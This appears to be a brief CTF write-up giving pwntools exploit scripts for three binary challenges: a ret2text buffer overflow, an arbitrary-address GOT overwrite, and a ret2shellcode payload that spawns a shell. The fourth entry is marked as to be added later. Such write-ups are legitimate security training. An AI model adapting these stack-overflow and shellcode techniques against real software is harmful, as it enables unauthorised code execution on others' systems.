pwn1:
Giveaway.
ret2text
from pwn import *
p = remote("hsc2019.site", 10105)
# 0x40 bytes fill the buffer, 8 more overwrite the saved rbp, and the return
# address is replaced with an address inside the binary's own code (ret2text)
pl1 = b"a" * 0x40 + p64(0) + p64(0x400741)
p.sendline(pl1)
p.interactive()
pwn2:
Giveaway.
Arbitrary address write, stack overflow
from pwn import *
p = remote("hsc2019.site", 10021)
# p = process("./pwn2")  # local copy for testing
context.log_level = 'debug'
sh = 0x400796        # value written into the GOT entry
puts_got = 0x601018  # GOT entry of puts (6295576 in decimal)
p.recvuntil(b"your ID?\n")
p.send(b"a")
p.recvuntil(b"Give me the target address?")
# the program reads the target address as a decimal number
p.sendline(str(puts_got).encode())
p.recvuntil(b"Give me the data:")
p.send(p64(sh))
p.interactive()
pwn3
Half giveaway:
ret2shellcode
from pwn import *
context(os='linux', arch='amd64')
p = process("./pwn3")
shellcode = asm(shellcraft.sh())
gdb.attach(p, 'b *0x4000cb')
# first input: overflow the 0x1a0-byte buffer and set up the return chain
payload = b'\0' * 0x1a0 + p64(0x600088) + p64(0x4000FB) + p64(0) + p64(0x60010C)
p.sendline(payload)
# second input: NOP sled followed by the shellcode
payload = b"\x90" * 0x34 + shellcode
p.sendline(payload)
p.interactive()
pwn4
Will add tomorrow.